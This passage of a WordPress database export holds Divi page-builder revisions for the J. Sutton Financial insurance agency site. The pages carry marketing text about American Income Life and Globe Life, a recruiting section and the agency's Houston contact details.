Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" url_new_window=\"on\" sticky_enabled=\"0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-04 11:50:10','2023-04-04 11:50:10','',26,'http://cmdev-site1.com/?p=765',0,'revision','',0),(782,3,'2023-04-05 11:58:42','2023-04-05 11:58:42','http://cmdev-site1.com/wp-content/uploads/2023/04/cropped-JSutton-Favicon-512x512-1.png','cropped-JSutton-Favicon-512x512-1.png','','inherit','open','closed','','cropped-jsutton-favicon-512x512-1-png','','','2023-04-05 11:58:42','2023-04-05 11:58:42','',0,'http://cmdev-site1.com/wp-content/uploads/2023/04/cropped-JSutton-Favicon-512x512-1.png',0,'attachment','image/png',0),(783,3,'2023-04-05 11:58:52','2023-04-05 11:58:52','{\n    \"site_icon\": {\n        \"value\": 782,\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2023-04-05 11:58:52\"\n    }\n}','','','trash','closed','closed','','c84c0f4e-7d42-4261-a59b-a30e1dcacc3b','','','2023-04-05 11:58:52','2023-04-05 11:58:52','',0,'http://cmdev-site1.com/2023/04/05/c84c0f4e-7d42-4261-a59b-a30e1dcacc3b/',0,'customize_changeset','',0),(784,3,'2023-04-05 12:30:27','2023-04-05 12:30:27','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"J. Sutton Financial Articles\" divider_style=\"dashed\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"15px|||||\" custom_padding=\"||31px|||\" global_colors_info=\"{}\"]<p style=\"font-weight: 400;\">Our resource articles are created to empower you with knowledge about insurance-related products, protection, prevention, and much more. Our hope is to educate our readers so you can feel confident when discussing insurance options – everything you read is unbiased and not specific to J. Sutton Financial policies.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-05 12:30:27','2023-04-05 12:30:27','',615,'http://cmdev-site1.com/?p=784',0,'revision','',0),(775,3,'2023-04-04 12:54:17','2023-04-04 12:54:17','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-04 12:54:17','2023-04-04 12:54:17','',26,'http://cmdev-site1.com/?p=775',0,'revision','',0),(905,3,'2023-04-11 21:29:54','2023-04-11 21:29:54','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work With Us\" button_alignment=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" header_2_text_align=\"center\" header_2_text_color=\"#000000\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" width_tablet=\"75%\" width_phone=\"75%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy 